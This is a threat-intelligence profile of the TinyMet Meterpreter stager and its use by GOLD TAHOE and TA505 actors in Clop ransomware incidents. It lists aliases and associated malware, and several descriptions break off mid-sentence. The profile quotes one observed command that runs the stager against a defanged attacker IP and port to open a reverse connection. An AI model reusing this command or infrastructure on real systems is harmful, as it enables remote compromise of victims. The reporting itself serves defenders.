Tinymet

Malware updated a year ago (2024-11-29T13:43:20.994Z)
TinyMet is a tiny, flexible, open-source Meterpreter stager. Threat actors such as GOLD TAHOE have used it to retrieve the Meterpreter stager in Clop ransomware incidents. It is typically introduced through suspicious downloads, emails, or websites; once inside, it gives the operator a foothold from which personal information can be stolen, operations disrupted, or data held hostage for ransom.

The malware was observed being executed with the command c:\intel\wsus.exe 1 91.214.124[.]20 43434, indicating a reverse HTTP connection. It connected to a malicious IP address, with the connection details supplied either by renaming the binary or by passing specific command-line arguments.

The investigation into these incidents revealed a possible link between the threat actor and TinyMet Payload v0.2, which Clop ransomware had previously used as a precursor to the TA505 post-exploitation operation. The use of this payload points to sophisticated attack planning and execution, suggesting experienced and highly skilled actors.

Our team discovered a file named wsus.exe, which appears to be a version of TinyMet, along with three additional files that were created and executed on the first compromised system. The file primarily operates as a version of TinyMet, but the actors also have the option to store and execute any binary loaded into the table. This flexibility allows them to adapt their approach to the specific vulnerabilities of the targeted system.
Description last updated: 2024-03-05T19:34:47.952Z
Possible Aliases / Cluster overlaps
It is hard to track cluster overlaps and naming conventions between vendors, so here are some possibly overlapping names and profiles you may also want to look at.

Alias (votes): Description

Meterpreter (2): Meterpreter is a possible alias for Tinymet. Meterpreter is a type of malware that acts as an attack payload within the Metasploit framework, providing threat actors with an interactive shell to control and execute code on a compromised system. The malware is often deployed covertly through suspicious downloads, emails, or websites. Once insta

Meterpreter Stager (2): Meterpreter Stager is a possible alias for Tinymet. The Meterpreter stager is a type of malware, which is malicious software designed to infiltrate and exploit computer systems. It can enter your system through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it has the potential to steal personal information, di
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Ransomware
Associated Malware
Alias (association type, votes): Description

Clop (Unspecified, 2): The Clop Malware is associated with Tinymet. Clop, a malicious software (malware), is linked to a Russian-speaking cybercriminal group also known as Cl0p. It is designed to exploit and damage computer systems by stealing personal information, disrupting operations, or holding data hostage for ransom. In May 2023, the Clop group began exploitin
Source Document References
Information about the Tinymet malware was read from the documents corpus below.